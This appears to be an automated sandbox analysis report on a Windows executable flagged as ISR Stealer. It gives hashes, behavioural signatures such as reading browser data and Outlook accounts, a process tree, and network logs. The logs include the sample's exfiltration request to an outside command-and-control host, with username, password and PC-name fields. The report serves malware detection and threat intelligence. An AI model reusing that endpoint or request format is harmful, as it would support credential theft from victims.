Analysis

  • max time kernel
    49s
  • max time network
    115s
  • platform
    windows7_x64
  • resource
    win7-20220901-en
  • resource tags

    arch:x64, arch:x86, image:win7-20220901-en, locale:en-us, os:windows7-x64, system
  • submitted
    21-11-2022 23:29

General

  • Target

    20f64afe66e77dbfea66194478ed94c27ddae050fbdd0344900bedc027846cb6.exe

  • Size

    1013KB

  • MD5

    729d6040af9af63c748491a3f0b597fb

  • SHA1

    f8b7ac08d14581cc35770a34ba49aa273b6ff659

  • SHA256

    20f64afe66e77dbfea66194478ed94c27ddae050fbdd0344900bedc027846cb6

  • SHA512

    b5c9ddf44e268d7bd4cc690ef83e5c4ffdbb2ba90a391a73373ba48735a608747581d84c365bf644d3a2a38a6280ae93c376779822dc83fbab496f80700acb09

  • SSDEEP

    12288:RaWzgMg7v3qnCiMErQohh0F4CCJ8lny/QQOJZri9oGE15jSsFZyoopMXnyTWn:AaHMv6Corjqny/QJJtkoRNFZyoRnyin

Malware Config

Signatures

  • ISR Stealer

    ISR Stealer is a modified version of Hackhound Stealer written in Visual Basic.

  • ISR Stealer payload 6 IoCs
  • NirSoft MailPassView 2 IoCs

    Password recovery tool for various email clients

  • Nirsoft 2 IoCs
  • UPX packed file 9 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\20f64afe66e77dbfea66194478ed94c27ddae050fbdd0344900bedc027846cb6.exe
    "C:\Users\Admin\AppData\Local\Temp\20f64afe66e77dbfea66194478ed94c27ddae050fbdd0344900bedc027846cb6.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2032
    • C:\Users\Admin\AppData\Local\Temp\20f64afe66e77dbfea66194478ed94c27ddae050fbdd0344900bedc027846cb6.exe
      "C:\Users\Admin\AppData\Local\Temp\20f64afe66e77dbfea66194478ed94c27ddae050fbdd0344900bedc027846cb6.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Modifies system certificate store
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:940
      • C:\Users\Admin\AppData\Local\Temp\20f64afe66e77dbfea66194478ed94c27ddae050fbdd0344900bedc027846cb6.exe
        /scomma "C:\Users\Admin\AppData\Local\Temp\A8MpcatkW3.ini"
        3⤵
        PID:1124
        • C:\Users\Admin\AppData\Local\Temp\20f64afe66e77dbfea66194478ed94c27ddae050fbdd0344900bedc027846cb6.exe
          /scomma "C:\Users\Admin\AppData\Local\Temp\lO0cajvQoQ.ini"
          3⤵
          • Accesses Microsoft Outlook accounts
          PID:1092

    Network

    • DNS
      prince.comxa.com
      20f64afe66e77dbfea66194478ed94c27ddae050fbdd0344900bedc027846cb6.exe
      Remote address:
      8.8.8.8:53
      Request
      prince.comxa.com
      IN A
      Response
      prince.comxa.com
      IN A
      153.92.0.100
    • GET
      http://prince.comxa.com/index.php?action=add&username=&password=&app=&pcname=RYNKSFQE&sitename=
      20f64afe66e77dbfea66194478ed94c27ddae050fbdd0344900bedc027846cb6.exe
      Remote address:
      153.92.0.100:80
      Request
      GET /index.php?action=add&username=&password=&app=&pcname=RYNKSFQE&sitename= HTTP/1.1
      User-Agent: HardCore Software For : Public
      Host: prince.comxa.com
      Response
      HTTP/1.1 301 Moved Permanently
      Server: nginx
      Date: Mon, 21 Nov 2022 23:29:37 GMT
      Content-Type: text/html
      Content-Length: 162
      Connection: keep-alive
      Location: https://www.000webhost.com/migrate?static=true
      X-Frame-Options: sameorigin
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
    • DNS
      www.000webhost.com
      20f64afe66e77dbfea66194478ed94c27ddae050fbdd0344900bedc027846cb6.exe
      Remote address:
      8.8.8.8:53
      Request
      www.000webhost.com
      IN A
      Response
      www.000webhost.com
      IN A
      104.19.185.120
      www.000webhost.com
      IN A
      104.19.184.120
    • GET
      https://www.000webhost.com/migrate?static=true
      20f64afe66e77dbfea66194478ed94c27ddae050fbdd0344900bedc027846cb6.exe
      Remote address:
      104.19.185.120:443
      Request
      GET /migrate?static=true HTTP/1.1
      User-Agent: HardCore Software For : Public
      Host: www.000webhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 403 Forbidden
      Date: Mon, 21 Nov 2022 23:29:38 GMT
      Content-Type: text/plain; charset=UTF-8
      Content-Length: 16
      Connection: keep-alive
      X-Frame-Options: SAMEORIGIN
      Referrer-Policy: same-origin
      Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
      Expires: Thu, 01 Jan 1970 00:00:01 GMT
      Server: cloudflare
      CF-RAY: 76dd3567bbb0b8de-AMS
      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
    • 153.92.0.100:80
      http://prince.comxa.com/index.php?action=add&username=&password=&app=&pcname=RYNKSFQE&sitename=
      http
      20f64afe66e77dbfea66194478ed94c27ddae050fbdd0344900bedc027846cb6.exe
      439 B
      1.2kB
      6
      5

      HTTP Request

      GET http://prince.comxa.com/index.php?action=add&username=&password=&app=&pcname=RYNKSFQE&sitename=

      HTTP Response

      301
    • 104.19.185.120:443
      https://www.000webhost.com/migrate?static=true
      tls, http
      20f64afe66e77dbfea66194478ed94c27ddae050fbdd0344900bedc027846cb6.exe
      960 B
      6.6kB
      10
      10

      HTTP Request

      GET https://www.000webhost.com/migrate?static=true

      HTTP Response

      403
    • 8.8.8.8:53
      prince.comxa.com
      dns
      20f64afe66e77dbfea66194478ed94c27ddae050fbdd0344900bedc027846cb6.exe
      62 B
      78 B
      1
      1

      DNS Request

      prince.comxa.com

      DNS Response

      153.92.0.100

    • 8.8.8.8:53
      www.000webhost.com
      dns
      20f64afe66e77dbfea66194478ed94c27ddae050fbdd0344900bedc027846cb6.exe
      64 B
      96 B
      1
      1

      DNS Request

      www.000webhost.com

      DNS Response

      104.19.185.120
      104.19.184.120

    MITRE ATT&CK Enterprise v6


    Downloads

    • C:\Users\Admin\AppData\Local\Temp\A8MpcatkW3.ini

      Filesize

      5B

      MD5

      d1ea279fb5559c020a1b4137dc4de237

      SHA1

      db6f8988af46b56216a6f0daf95ab8c9bdb57400

      SHA256

      fcdcc2c46896915a1c695d6231f0fee336a668531b7a3da46178c80362546dba

      SHA512

      720e9c284f0559015312df7fe977563e5e16f48d3506e51eb4016adf7971924d352f740b030aa3adc81b6f65fd1dba12df06d10fa6c115074e5097e7ee0f08b3

    • memory/940-71-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

    • memory/940-55-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

    • memory/940-56-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

    • memory/940-58-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

    • memory/940-60-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

    • memory/940-61-0x0000000000401180-mapping.dmp

    • memory/940-84-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

    • memory/940-83-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

    • memory/1092-77-0x000000000041C410-mapping.dmp

    • memory/1092-76-0x0000000000400000-0x000000000041F000-memory.dmp

      Filesize

      124KB

    • memory/1092-80-0x0000000000400000-0x000000000041F000-memory.dmp

      Filesize

      124KB

    • memory/1092-81-0x0000000000400000-0x000000000041F000-memory.dmp

      Filesize

      124KB

    • memory/1092-82-0x0000000000400000-0x000000000041F000-memory.dmp

      Filesize

      124KB

    • memory/1124-72-0x0000000000400000-0x0000000000453000-memory.dmp

      Filesize

      332KB

    • memory/1124-70-0x0000000000400000-0x0000000000453000-memory.dmp

      Filesize

      332KB

    • memory/1124-73-0x0000000000400000-0x0000000000453000-memory.dmp

      Filesize

      332KB

    • memory/1124-69-0x0000000000400000-0x0000000000453000-memory.dmp

      Filesize

      332KB

    • memory/1124-66-0x00000000004512E0-mapping.dmp

    • memory/1124-65-0x0000000000400000-0x0000000000453000-memory.dmp

      Filesize

      332KB

    • memory/2032-54-0x00000000766D1000-0x00000000766D3000-memory.dmp

      Filesize

      8KB
